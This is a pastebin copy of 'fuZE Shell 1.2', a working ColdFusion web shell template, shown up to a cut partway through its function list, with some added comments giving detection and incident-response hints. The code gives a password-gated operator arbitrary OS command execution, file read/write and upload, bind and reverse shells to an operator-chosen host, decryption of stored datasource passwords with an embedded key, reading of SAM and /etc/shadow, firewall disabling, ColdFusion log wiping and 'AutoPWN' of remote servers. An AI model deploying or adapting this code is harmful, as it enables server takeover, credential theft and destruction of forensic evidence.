
Untitled

a guest Dec 5th, 2018 180 Never
 
  1. <html>
  2.  
  3. <!---
  4. #======================================#
  5. # DeV: XiX           .###      9/26/11 #
  6. #                    #                 #
  7. #              ###  /##/               #
  8. #             #    ,#                  #
  9. # v3r 1.2     \#####`                  #
  10. #======================================#
  11. #                 FuZE                 #
  12. #======================================#
  13. #                                      #
  14. # Changes in this release:             #
  15. # > AutoPWN improved                   #
  16. #                                      #
  17. # ThX ^_^:                             #
  18. # > fractal - css & jquery             #
  19. # > chippy1337                         #
  20. # > MoJiNao, xXx, & Seraph             #
  21. #                                      #
  22. #======================================#
  23. --->
  24.  
  25. <!--- Login config: operator credentials hard-coded in the template and compared against the submitted login form further down. Both literals are fixed in this sample, so they can serve as content signatures when scanning web roots. ---->
  26. <cfset UserName="hackintosh">
  27. <cfset Password="b98c1264f01b63dd0cb305e05d903eeb6ce6d98c"> <!--- Labelled MD5 by the author; the literal is 40 hex characters, which is not the length of an MD5 digest (32). --->
  28. <!--- ------------------------------ ---->
  29.  
  30. <head>
  31. <cfsetting requesttimeout="3600"> <!--- Raises this request's timeout to 3600 seconds, presumably so long-running actions are not cut off. --->
  32. <cfset tickBegin = GetTickCount()> <!--- Start tick; where it is read lies outside this part of the listing. --->
  33. <cfset so = CreateObject("java", "java.lang.System")> <!--- Handle to java.lang.System; the header table reads the user.name property through it, i.e. the account the ColdFusion JVM runs as. --->
  34. <cftry>
  35. <cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect"> <!--- First attempt: attach to an existing Scripting.FileSystemObject COM instance. COM instantiation of this class from a CFML template is worth flagging in template review. --->
  36. <cfcatch type="any">
  37. <cftry>
  38. <cfobject type="com" class="scripting.filesystemobject" name="fso" action="create"> <!--- Fallback: create a new instance of the same COM class. --->
  39. <cfcatch> <!--- Neither COM call succeeded; the error is swallowed, FSO stays undefined and the header shows N/A for drive info. ---> </cfcatch>
  40. </cftry>
  41. </cfcatch>
  42. </cftry>
  43. <cfif isDefined("FSO")><cfset Drives = FSO.Drives></cfif> <!--- Drive collection used by the header table to list drive letters, sizes and types. --->
  44. <cfset icon = ""> <!--- Icon URLs are empty strings in this copy. --->
  45. <cfset icon_close = "">
  46. <title>.:: &fnof;uZE Shell ::.</title>
  47. <link rel="SHORTCUT ICON" href="<cfoutput>#icon#</cfoutput>">
  48. <style type="text/css">
  49. html,body{font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11px;background-color:black;color:#bbbbbb;height:98%;overflow:inherit}
  50. table.header-table td { padding:10px; border-width:5px; border-style:outset; }
  51. table.content-table td { padding:10px; border-width:5px; border-style:outset; }
  52. table.function-table td { padding:10px; border-width:5px; border-style:outset; }
  53. textarea.report { width:100%;min-width:400px;background-color:black;color:#bbbbbb; }
  54. #mask { position:absolute; z-index:9000; background-color:#000; display:none; }
  55. #boxes .window { position:fixed;  left:0;  top:0;  width:530px; display:none;  z-index:9999; padding:20px; background-color:black;color:#bbbbbb;border-left:solid 1px #00009f;border-right:solid 1px #00009f;border-bottom:solid 1px #00009f; }
  56. #layer1_handle{position:relative;background-color:#00009F;padding:2px;text-align:center;color:#FFF;vertical-align:middle;top:-35px;margin-left:-21px;margin-right:-21px;}
  57. #_close{float:right;text-decoration:none;color:#FFF;}
  58. #_color{background-color:black;color:#bbbbbb;}
  59. #nav a{height:14px;display:block;border:1px solid #000;color:#FFF;text-decoration:none;background-color:#000098;padding-bottom:5px}
  60. #nav a:hover{background-color:#696AF6;color:#FFF}
  61. ._btn{padding:0;margin:0;width:80px;font-size:12px;background-color:#0000B0;color:#bbbbbb;}
  62. .container{position:relative;top:-115px;text-align:center;font-size:14px;float:right;}
  63. .menu{position:relative;top:-21px;height:20px;width:280px;float:right;padding-top:5px;padding-bottom:5px;}
  64. </style>
  65. <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
  66. <script>
  67. $(document).ready(function() {  
  68.     //select all the a tag with name equal to modal
  69.     $('a[name=modal]').click(function(e) {
  70.         //Cancel the link behavior
  71.         e.preventDefault();
  72.         //Get the A tag
  73.         var id = $(this).attr('href');    
  74.         //Get the screen height and width
  75.         var maskHeight = $(document).height();
  76.         var maskWidth = $(window).width();    
  77.         //Set height and width to mask to fill up the whole screen
  78.         $('#mask').css({'width':maskWidth,'height':maskHeight});        
  79.         //transition effect    
  80.         $('#mask').fadeIn(1000);  
  81.         $('#mask').fadeTo("slow",0.8);      
  82.         //Get the window height and width
  83.         var winH = $(window).height();
  84.         var winW = $(window).width();              
  85.         //Set the popup window to center
  86.         $(id).css('top',  winH/2-$(id).height()/2);
  87.         $(id).css('left', winW/2-$(id).width()/2);    
  88.         //transition effect
  89.         $(id).fadeIn(2000);    
  90.     });
  91.     //if close button is clicked
  92.     $('.window .close').click(function (e) {
  93.         //Cancel the link behavior
  94.         e.preventDefault();
  95.         $('#mask, .window').hide();
  96.     });    
  97.     //if mask is clicked
  98.     $('#mask').click(function () {
  99.         $(this).hide();
  100.         $('.window').hide();
  101.     });        
  102. });
  103. </script>
  104. </head>
  105. <body>
  106.  
  107. <cfif IsDefined("LoginButton")> <!--- Login gate: runs only when a LoginButton variable is present in the request. The form that submits it is not in this part of the listing. --->
  108. <cfif Form.UserName eq "#UserName#" and Hash("#Form.Password#") eq "#Password#"> <!--- Compares the submitted user name with the hard-coded one, and Hash() of the submitted password (called with no algorithm argument) with the hard-coded digest string. --->
  109. <cflogin>
  110. <cfloginuser name="#UserName#" password="#Password#" roles="admin"> <!--- Registers the session with ColdFusion's login framework under the role "admin"; the IsUserLoggedIn() check that follows keys off this. --->
  111. </cflogin>
  112. </cfif>
  113. </cfif>
  114.  
  115. <cfif IsDefined("LogoutButton")>
  116.  <cflogout> <!--- Drops the cflogin session when a LogoutButton variable is present. --->
  117. </cfif>
  118.  
  119. <cfif IsUserLoggedIn() eq "Yes">
  120. <div id="boxes">    
  121.     <div id="execute" class="window">
  122.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Console</div>
  123.         <center><pre>:: Execute command on server ::</pre></center>
  124.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  125.         <input type="text" id="_color" name="exec" size=40 <cfif isdefined("Form.exec")>value="<cfoutput>#htmleditformat(Form.exec)#</cfoutput>"</cfif>>
  126.         <input name="submit" value="Execute" class="_btn" type="submit"><br />
  127.         <input type=checkbox name="nolimit"> No execution time limit
  128.         </form><br />
  129.     </div>
  130.     <div id="edit" class="window">
  131.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Edit</div>
  132.         <center><pre>:: Edit file ::</pre></center>
  133.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  134.         File path | <input type="text" id="_color" name="EditFile" size=40 <cfif isDefined("Form.EditFile")>value="<cfoutput>#htmleditformat(Form.EditFile)#</cfoutput>"</cfif>>
  135.         <input name="submit" value="Edit" class="_btn" type="submit">
  136.         </form><br />
  137.     </div>
  138.     <div id="reverse" class="window">
  139.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Reverse Shell</div>
  140.         <center><pre>:: Reverse shell ::</pre></center>
  141.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  142.         <center><input type="text" id="_color" name="reverseip" size=15 <cfif isDefined("Form.reverseip")>value="<cfoutput>#htmleditformat(Form.reverseip)#</cfoutput>"</cfif>> :
  143.         <input type="text" id="_color" name="reverseport" size=5 <cfif isDefined("Form.reverseport")>value="<cfoutput>#htmleditformat(Form.reverseport)#</cfoutput>"</cfif>>
  144.         <input name="submit" value="Connect" class="_btn" type="submit"></center>
  145.         </form>
  146.     </div>
  147.     <div id="bind" class="window">
  148.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Bindshell</div>
  149.         <center><pre>:: Bindshell ::</pre></center>
  150.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  151.         <center>[1024-65535] <input type="text" id="_color" name="bindport" size=10 <cfif isdefined("Form.bindport")>value="<cfoutput>#htmleditformat(Form.bindport)#</cfoutput>"</cfif>>
  152.         <input name="submit" value="Bind" class="_btn" type="submit">
  153.         <a href="data:text/html;base64,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"> [Tips]</a></center>
  154.         </form>
  155.     </div>
  156.     <div id="functions" class="window">
  157.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Functions</div>
  158.         <center><pre>:: Functions ::</pre></center>
  159.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  160.         <select name="function" style="width: 325px">
  161.         <option selected="yes">Select a function</option><optgroup label="ColdFusion"><option>Dump datasource passwords</option><option>Dump CF hashes</option><option>Restart JRUN server (CF)</option><option>Wipe ColdFusion logs</option></optgroup><optgroup label="Windows"><option>Disable Windows firewall</option><option>Enable Telnet service</option><option>Show opened ports [W]</option><option>Read SAM</option><option>Read SECURITY</option><option>Read SYSTEM</option><option>Read IIS paths</option><option>View open sessions [W]</option><option>View local shares</option><option>View domain shares</option><option>View users</option><option>View running processes [W]</option><option>View system info [W]</option><option>Check disk for consistency</option></optgroup><optgroup label="Linux"><option>Find SUID files</option><option>Find SGID files</option><option>Find all *conf* files</option><option>Find all .*_history files</option>
  162.         <option>Find all *.pwd files</option><option>Find all .*rc files</option><option>Find all writable directories and files</option><option>Find all writable directories and files in current dir</option><option>Read /etc/passwd</option><option>Read /etc/shadow</option><option>Read /proc/self/environ</option><option>Show opened ports [L]</option><option>View open sessions [L]</option><option>View recent sessions</option><option>View running processes [L]</option>
  163.         <option>View memory info</option><option>View CPU info</option><option>View system info [L]</option></optgroup></select><input name="submit" value="Execute" class="_btn" type="submit"></form>
  164.     </div>
  165.     <div id="decrypt" class="window">
  166.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Decrypter</div>
  167.         <center><pre>:: CF hash decrypter ::</pre></center>
  168.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  169.         B64 CF hash | <input type="text" id="_color" name="decrypt_hash" size=35 <cfif isdefined("Form.decrypt_hash")>value="<cfoutput>#htmleditformat(Form.decrypt_hash)#</cfoutput>"</cfif>>
  170.         <input name="submit" value="Decrypt" class="_btn" type="submit">
  171.         </form>
  172.     </div>
  173.     <div id="updown" class="window">
  174.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>File Transfer</div>
  175.         <center><pre>:: Upload/Download files on server ::</pre></center>
  176.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" enctype="multipart/form-data" name="Upload" id="Upload"><center>
  177.         <input type="file" name="File"/>
  178.         <input class="_btn" type="submit" name="Upload" value="Upload"/></center>
  179.         </form>
  180.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  181.         Path | <input type="text" id="_color" name="Download" size=40 <cfif isDefined("Form.Download")>value="<cfoutput>#htmleditformat(Form.Download)#</cfoutput>"</cfif>>
  182.         <input name="submit" value="Download" class="_btn" type="submit">
  183.         </form>
  184.     </div>
  185.     <div id="upremote" class="window">
  186.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Remote upload</div>
  187.         <center><pre>:: Upload files from remote server ::</pre></center>
  188.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  189.         URL | <input type="text" id="_color" name="RUpload" size=40 <cfif isDefined("Form.RUpload")>value="<cfoutput>#htmleditformat(Form.RUpload)#</cfoutput>"</cfif>>
  190.         <input name="submit" value="Upload" class="_btn" type="submit">
  191.         </form>
  192.     </div>
  193.     <div id="runsql" class="window">
  194.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Sql</div>
  195.         <center><pre>:: Run SQL query ::</pre></center>
  196.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  197.         SQL query | <input type="text" id="_color" name="exec_sql" size=35<cfif isdefined("Form.exec_sql")>value="<cfoutput>#htmleditformat(Form.exec_sql)#</cfoutput>"</cfif>><br />
  198.         Datasource | <input type="text" id="_color" name="datasource" size=15<cfif isdefined("Form.datasource")>value="<cfoutput>#htmleditformat(Form.datasource)#</cfoutput>"</cfif>><br />
  199.         User : Pass | <input type="text" id="_color" name="db_username" size=15 <cfif isdefined("Form.db_username")>value="<cfoutput>#htmleditformat(Form.db_username)#</cfoutput>"</cfif>><input type="text" id="_color" name="db_password" size=15 <cfif isdefined("Form.db_password")>value="<cfoutput>#htmleditformat(Form.db_password)#</cfoutput>"</cfif>><br />
  200.         <input name="submit" value="Run" class="_btn" type="submit">
  201.         </form>
  202.     </div>
  203.     <div id="scanlan" class="window">
  204.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Scan</div>
  205.         <center><pre>:: Scan LAN for CF ::</pre></center>
  206.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  207.         <center><input name="cfscan" value="Scan" class="_btn" type="submit"></center>
  208.         </form>
  209.     </div>
  210.     <div id="registry" class="window">
  211.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Registry</div>
  212.         <center><pre>:: Registry ::</pre></center>
  213.         <form method="post" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>"><table>
  214.         <tr><td>Path | </td><td><input name="regpath" type="text" id="_color" size="40" value="<cfif isDefined("Form.regpath")><cfoutput>#htmleditformat(Form.regpath)#</cfoutput><cfelse>HKEY_LOCAL_MACHINE\</cfif>" /></td></tr><tr>
  215.         <td>Key | </td><td><input type="text" id="_color" name="Entry" size="15" <cfif isDefined("Form.Entry")>value="<cfoutput>#htmleditformat(Form.Entry)#</cfoutput>"</cfif> /></td></tr><tr>
  216.         <td>New key | </td><td><input type="text" id="_color" name="newentry" size="15" <cfif isDefined("Form.newentry")>value="<cfoutput>#htmleditformat(Form.newentry)#</cfoutput>"</cfif> /></td></tr></table>
  217.         <select name="regtype">
  218.             <option value="dWord">dWord</option>
  219.             <option value="string">string</option>
  220.         </select>
  221.         <br />
  222.         <input class="_btn" type="submit" name="Submit" value="Submit" />
  223.         </form>
  224.     </div>
  225.     <div id="autopwn" class="window">
  226.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>AutoPWN</div>
  227.         <center><pre>:: AutoPWN remote CF ::</pre></center>
  228.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  229.         Target | http://<input type="text" id="_color" name="target_host" size=40 <cfif isDefined("Form.target_host")>value="<cfoutput>#htmleditformat(Form.target_host)#</cfoutput>"</cfif>>/
  230.         <input name="submit" value="AutoPWN" class="_btn" type="submit">
  231.         </form>
  232.     </div>
  233.     <div id="nuke" class="window">
  234.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Nuke</div>
  235.         <center><pre>:: Nuke shell ::</pre></center>
  236.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  237.         <center><input name="nuke" value="Nuke" class="_btn" type="submit"></center>
  238.         </form>
  239.     </div>
  240.     <div id="irc" class="window">
  241.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>IRC</div>
  242.         <center><pre>:: IRC datapipe ::</pre></center>
  243.         <table>
  244.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>"><center>
  245.         <tr><td>IP:</td><td><input type="text" id="_color" name="ircip" size=15 <cfif isDefined("Form.ircip")>value="<cfoutput>#htmleditformat(Form.ircip)#</cfoutput>"<cfelse>value="127.0.0.1"</cfif>></td></tr>
  246.         <tr><td>Port:</td><td><input type="text" id="_color" name="ircport" size=5 <cfif isDefined("Form.ircport")>value="<cfoutput>#htmleditformat(Form.ircport)#</cfoutput>"<cfelse>value="6667"</cfif>></td></tr>
  247.         <tr><td>Nick name:</td><td><input type="text" id="_color" name="ircnick" size=15 <cfif isDefined("Form.ircnick")>value="<cfoutput>#htmleditformat(Form.ircnick)#</cfoutput>"<cfelse>value="fuZE"</cfif>></td></tr>
  248.         <tr><td>User name:</td><td><input type="text" id="_color" name="ircuname" size=15 <cfif isDefined("Form.ircuname")>value="<cfoutput>#htmleditformat(Form.ircuname)#</cfoutput>"<cfelse>value="fuZE"</cfif>></td></tr>
  249.         <tr><td>Real name:</td><td><input type="text" id="_color" name="ircrname" size=20 <cfif isDefined("Form.ircrname")>value="<cfoutput>#htmleditformat(Form.ircrname)#</cfoutput>"<cfelse>value="fuZE CF IRC Datapipe"</cfif>></td></tr>
  250.         <tr><td>Channel:</td><td><input type="text" id="_color" name="ircchan" size=15 <cfif isDefined("Form.ircchan")>value="<cfoutput>#htmleditformat(Form.ircchan)#</cfoutput>"<cfelse>value="#fuZE"</cfif>></td></tr>
  251.         <tr><td><input name="submit" value="Connect" class="_btn" type="submit"></center></td></tr>
  252.         </form>
  253.         </table>
  254.     </div>
  255.     <div id="mask"></div>
  256. </div>
  257. <table class="header-table" width=100%>
  258. <tr>
  259. <td><img src="<cfoutput>#icon#</cfoutput>"><sup> &fnof;uZE Shell 1.2</sup></td>
  260. <td><div style="float:left;"><cfoutput><pre>#dateformat(now(),'mm-dd-yyyy')# #timeformat(now(),'HH:mm:ss')# Your IP: #cgi.remote_addr# [#cgi.remote_host#] Server IP: #cgi.local_addr# [#cgi.http_host#]</pre></cfoutput></div>
  261. <div style="float:right;"><cfform action="" method="post" name="LogoutForm"><cfinput class="_btn" type="submit" name="LogoutButton" value="Logout"></cfform></div>
  262. </td>
  263. </tr>
  264. <tr>
  265. <td align="right"><pre>OS :<br />CF :<br />ID :<br />CWD :<br />Drive info :</pre></td>
  266. <td>
  267. <cfoutput>
  268. <pre>#server.os.name# [#server.os.version#] #server.os.arch#<br />#server.coldfusion.productname# [#server.coldfusion.productlevel#] #server.coldfusion.productversion#<br />#so.getProperty("user.name")#<br />#getDirectoryFromPath(getCurrentTemplatePath())#<br /><cfif isDefined("FSO")><cfloop collection="#drives#" item="this"><cfif this.DriveLetter is not "A">#this.DriveLetter# [<cfif this.isReady AND ISDefined("this.TotalSize")>#NumberFormat(round(evaluate(this.TotalSize/1024/1024/1024)))# GB </cfif><cfswitch expression="#this.DriveType#">
  269. <cfcase value="1">Removable</cfcase>
  270. <cfcase value="2">Fixed</cfcase>
  271. <cfcase value="3">Network</cfcase>
  272. <cfcase value="4">CDROM</cfcase>
  273. <cfcase value="5">RAMDisk</cfcase>
  274. <cfdefaultcase>Unknown</cfdefaultcase>
  275. </cfswitch>] </cfif></cfloop><cfelse>N/A</cfif></pre>
  276. </cfoutput>
  277. </td>
  278. </tr>
  279. </table>
  280.  
  281. <table class="content-table" width=100%>
  282. <tr><td width="75%"><cfoutput>
  283. <cfif isdefined("Form.exec")> <!--- Console action: the exec form field is handed to the operating system command interpreter through cfexecute. Host-side artefact for detection: cmd.exe or sh started as a child of the ColdFusion/JVM service process. --->
  284.  <cfif isdefined("Form.nolimit")><cfset exectimeout=3600><cfelse><cfset exectimeout=10></cfif> <!--- cfexecute timeout: 10 by default, 3600 when the nolimit checkbox was submitted. --->
  285.  <cfif server.os.name neq "UNIX">
  286.   <pre>Executing 'cmd.exe /c #htmleditformat(Form.exec)#'</pre>
  287.   <cfexecute name="cmd.exe" arguments="/c #Form.exec#" timeout="#exectimeout#" variable="cmdout"></cfexecute> <!--- Any OS name other than "UNIX" takes this branch; the field value goes to cmd.exe unmodified. --->
  288.  <cfelse>
  289.   <pre>Executing 'sh -c "#htmleditformat(REReplace(Form.exec,"""","'","ALL"))#"'</pre>
  290.   <cfexecute name="sh" arguments="-c ""#REReplace(Form.exec,"""","'","ALL")#""" timeout="#exectimeout#" variable="cmdout"></cfexecute> <!--- Double quotes in the field are replaced by single quotes before the value is wrapped in double quotes for sh. --->
  291.  </cfif>
  292.  <textarea class="report" rows="20">#htmleditformat(cmdout)#</textarea> <!--- Captured command output is HTML-escaped and shown to the operator. --->
  293. <cfelseif isdefined("Form.EditFile")>
  294. <pre>Editing file '#htmleditformat(Form.EditFile)#'</pre>
  295. <cftry>
  296. <cfif fileexists(Form.EditFile)>
  297. <!--- OK --->
  298. <cfelse>
  299. <cfthrow message="File not found">
  300. </cfif>
  301. <cffile action="Read" file="#Form.EditFile#" variable="FileData">
  302. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  303. <textarea name="FileContent" class="report" rows="20"><cfoutput>#htmleditformat(FileData)#</cfoutput></textarea>
  304. Save to | <input type="text" id="_color" name="SaveFile" size=40 value="<cfoutput>#Form.EditFile#</cfoutput>"> <input name="submit" value="Save" class="_btn" type="submit">
  305. </form>
  306. <cfcatch><textarea class="report" rows="20">Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></textarea></cfcatch>
  307. </cftry>
  308. <cfelseif isDefined("Form.SaveFile")>
  309. <pre>Saving file '#htmleditformat(Form.SaveFile)#'</pre>
  310. <textarea class="report" rows="20">
  311. <cftry>
  312. <cffile action="Write" file="#Form.SaveFile#" output="#Form.FileContent#" addnewline = "no">Save success
  313. <cfcatch>Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
  314. </cftry>
  315. </textarea>
  316. <cfelseif isdefined("Form.bindport")>
  317. <pre>Binding shell to port #htmleditformat(Form.bindport)#</pre>
  318. <textarea class="report" rows="20">
  319. <cftry>
  320. <cfscript>
  321. try{
  322.  
  323. // Create socket: listens on the port taken from the bindport form field, inside the ColdFusion JVM. Defender view: the application server process gains a listening port it does not normally own.
  324. serversocket=createObject("java","java.net.ServerSocket");
  325. serversocket.init(Form.bindport);
  326. writeoutput("ServerSocket created at port #serversocket.getLocalPort()##chr(10)#");
  327.  
  328. // Accept incoming connections: accept() blocks this request until a client connects, so the HTTP request that started it stays open.
  329. connection=serversocket.accept();
  330. writeoutput("Connection received from #connection.getInetAddress().getHostName()##chr(10)#");
  331.  
  332. // Establish connection
  333. try{
  334. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(connection.getInputStream()));
  335. outstream=createObject("java","java.io.PrintWriter").init(connection.getOutputStream());
  336. writeoutput("Connection successful!#chr(10)#");
  337. } catch (IOException e) {
  338. writeoutput("IO Exception: Read failed#chr(10)#");
  339. }
  340.  
  341. // Communicate
  342. outstream.println(".:: fuZE CF Bindshell ::.");
  343. outstream.print("> ");
  344. outstream.flush();
  345. while(True){
  346. str = instream.readLine();
  347. cmd = str.split(" ");
  348. if (not str.matches("exit")){
  349. p = createObject("java","java.lang.ProcessBuilder").init(cmd).start();
  350. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  351. br = createObject("java","java.io.BufferedReader").init(i);
  352. line=br.readLine();
  353. while (isDefined("line")) {
  354. outstream.println(line);
  355. outstream.flush();
  356. line = br.readLine();
  357. }
  358. br.close();
  359. i.close();
  360. outstream.print("> ");
  361. outstream.flush();
  362. }
  363. else {
  364. outstream.println("Terminating");
  365. outstream.close();
  366. instream.close();
  367. connection.close();
  368. serversocket.close();
  369. }
  370. }
  371.  
  372. }catch (Exception e) {
  373. writeoutput("Exception: Error#chr(10)#");
  374. }
  375. </cfscript>
  376. <cfcatch>Connection terminated</cfcatch>
  377. </cftry>
  378. </textarea>
  379. <cfelseif isDefined("Form.reverseip") and isDefined("Form.reverseport")>
  380. <pre>Sending shell to #htmleditformat(Form.reverseip)#:#htmleditformat(Form.reverseport)#</pre>
  381. <textarea class="report" rows="20">
  382. <cftry>
  383. <cfscript>
  384. try{
  385.  
  386. // Create socket: plain java.net.Socket created inside the ColdFusion JVM.
  387. socket=createObject("java","java.net.Socket");
  388.  
  389. // Connect to remote host: outbound TCP connection from the ColdFusion JVM to the address and port taken from the reverseip and reverseport form fields. Defender view: egress filtering on the application server, and alerting on outbound connections made by the service account, cover this path.
  390. socket.connect(createObject("java","java.net.InetSocketAddress").init(Form.reverseip,Form.reverseport));
  391. writeoutput("Remote port reached: #socket.isConnected()##chr(10)#");
  392.  
  393. // Establish connection
  394. try{
  395. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(socket.getInputStream()));
  396. outstream=createObject("java","java.io.PrintWriter").init(socket.getOutputStream());
  397. writeoutput("Connection successful!#chr(10)#");
  398. } catch (IOException e) {
  399. writeoutput("IO Exception: Read failed#chr(10)#");
  400. }
  401.  
  402. // Communicate
  403. outstream.println(".:: fuZE CF Reverse Shell ::.");
  404. outstream.print("> ");
  405. outstream.flush();
  406. while(True){
  407. str = instream.readLine();
  408. cmd = str.split(" ");
  409. if (not str.matches("exit")){
  410. p = createObject("java","java.lang.ProcessBuilder").init(cmd).start();
  411. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  412. br = createObject("java","java.io.BufferedReader").init(i);
  413. line=br.readLine();
  414. while (isDefined("line")) {
  415. outstream.println(line);
  416. outstream.flush();
  417. line = br.readLine();
  418. }
  419. br.close();
  420. i.close();
  421. outstream.print("> ");
  422. outstream.flush();
  423. }
  424. else {
  425. outstream.println("Terminating");
  426. outstream.close();
  427. instream.close();
  428. socket.close();
  429. }
  430. }
  431.  
  432. }catch (Exception e) {
  433. writeoutput("Exception: Error#chr(10)#");
  434. }
  435. </cfscript>
  436. <cfcatch>Connection terminated</cfcatch>
  437. </cftry>
  438. </textarea>
  439. <cfelseif isDefined("Form.function")>
  440. <pre>Function: '#htmleditformat(Form.function)#'</pre>
  441. <textarea class="report" rows="20">
  442. <cftry>
  443. <cfswitch expression="#Form.function#">
  444. <!--- ColdFusion functions --->
  445. <cfcase value="Dump datasource passwords">Datasource : Password
  446. <cfscript>
  447. o=createobject("java","coldfusion.server.ServiceFactory").getDatasourceService().getDatasources(); // Enumerates every datasource registered with this ColdFusion instance through the internal ServiceFactory class.
  448. for(i in o) {
  449. if(len(o[i]["password"])){ // Skips datasources that have no stored password.
  450. dp=Decrypt(o[i]["password"], generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64") ; // Decrypts the stored value with the key literal embedded here. Incident response: every datasource credential on a host where this ran should be treated as disclosed and rotated.
  451. writeoutput("#htmleditformat(i)# : #htmleditformat(dp)##chr(10)#");
  452. }
  453. }
  454. </cfscript>
  455. </cfcase>
  456. <cfcase value="Dump CF hashes"><cffile action="READ" file="#Server.ColdFusion.RootDir#\lib\password.properties" variable="cfhashes">#htmleditformat(cfhashes)#</cfcase><!--- Reads lib\password.properties under the ColdFusion root directory and prints its content, which the menu labels as CF hashes. Incident response: treat the credentials stored in that file as exposed and reset them. The path is built with a backslash only. --->
  457. <cfcase value="Restart JRUN server (CF)">
  458. <cfscript>
  459. oJRun = CreateObject("java","jrunx.kernel.JRun");
  460. oJRun.restart(oJRun.getServerName());
  461. </cfscript>
  462. </cfcase>
  463. <cfcase value="Wipe ColdFusion logs"><!--- Anti-forensics action: overwrites every file matching *.log in the ColdFusion log directory. --->
  464. <cfset sf = CreateObject("java", "coldfusion.server.ServiceFactory")>
  465. <cfset logDir = sf.LoggingService.getLogDirectory()><!--- Log directory is asked from the running server, not hard-coded. --->
  466. <cfif server.os.name neq "UNIX">
  467. <cfset osSlash = "\">
  468. <cfelse>
  469. <cfset osSlash = "/">
  470. </cfif>
  471. <cfdirectory action="list" directory="#logDir#" name="logs" filter="*.log">
  472. <cfloop query="logs">
  473. <cffile action="write" file="#logDir##osSlash##logs.Name#" output="## Purged" addnewline="yes"><!--- Each log is replaced by the single line written here (a hash sign followed by " Purged"). A log file holding only that line is a tamper indicator, and forwarding logs off the host preserves what this destroys. --->
  474. </cfloop>
  475. </cfcase>
  476. <!--- Windows functions --->
  477. <cfcase value="Disable Windows firewall"><cfexecute name="cmd.exe" arguments="/c netsh firewall set opmode disable" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  478. <cfcase value="Enable Telnet service"><cfexecute name="cmd.exe" arguments="/c sc config tlntsvr start= demand & net start telnet" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  479. <cfcase value="Show opened ports [W]"><cfexecute name="cmd.exe" arguments="/c netstat -aon" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  480. <cfcase value="Read SAM"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SAM" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  481. <cfcase value="Read SECURITY"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SECURITY" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  482. <cfcase value="Read SYSTEM"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SYSTEM" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  483. <cfcase value="Read IIS paths">Path : Domain : LogFileDirectory
  484. <cftry>
  485. <cfset xmlPath=arrayNew(1)>
  486. <cfset xmllocation=arraynew(1)>
  487. <cfset xmlServerindings=arraynew(1)>
